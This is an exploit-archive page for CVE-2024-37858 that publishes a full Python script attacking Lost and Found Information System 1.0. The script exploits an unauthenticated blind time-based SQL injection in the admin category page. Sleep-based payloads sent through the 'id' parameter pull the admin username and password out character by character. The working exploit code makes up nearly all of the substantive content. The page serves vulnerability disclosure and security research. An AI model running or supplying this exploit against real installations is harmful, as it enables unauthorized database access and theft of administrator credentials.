Lost And Found Information System 1.0 SQL Injection

Lost And Found Information System 1.0 SQL Injection: Posted Jun 13, 2024; Authored by Amit Roy; Lost and Found Information System version 1.0 suffers from an unauthenticated blind time-based remote SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2024-37858; SHA-256 | 7aedced0fdccf4a2850ec7db755dae9b61e52dc3f3c4359c11d7d251b16756f9; Download | Favorite | View

Lost And Found Information System 1.0 SQL Injection

# Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System 
# Exploit Author: Amit Roy (Rezur / AR0x7)
# Date: June 07, 2024
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# CVE : CVE-2024-37858

import requests,string,sys,argparse

r = requests.Session()
proxies = {'http': 'http://127.0.0.1:8080'}

admin_path = "/php-lfis/admin/index.php"
createCategory_path = "/php-lfis/classes/Master.php"

def char_extract(rhost, payload):
    params = {"page": "categories/manage_category", "id": payload}
    response = r.get(rhost+admin_path, params=params)
    if response.elapsed.total_seconds() > 1:
        return True
    else:
        return False
    
def sqli(rhost, column):
    charset = string.printable
    output_length = 200
    output = ""
    for i in range(output_length):
        for char in charset:
            # Extracts the credentials of user with id=1, admin by default
            payload = "13371337' or if((char(%s)=(select substring(%s,%s,1) from users where id=1)),sleep(1),1)-- -" % (ord(str(char)),str(column),str(i+1))
            sys.stdout.write(f"\r[*] Extracting: {output}\r")
            if char_extract(rhost, payload):
                output += char
                break
            elif char == '~' and not char_extract(rhost, payload):
                print("[*] Extracting:",output)
                return output

def argsetup():
    about  = 'Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)
    args = parser.parse_args()
    return args

def main():
    args   = argsetup()
    rhost = args.target
    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))

if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 256 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 8 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 3 files
nu11secur1ty 3 files
h00die-gr3y 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,448)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,344)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,672)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

Lost And Found Information System 1.0 SQL Injection

Lost And Found Information System 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Lost And Found Information System 1.0 SQL Injection

Share This

Lost And Found Information System 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems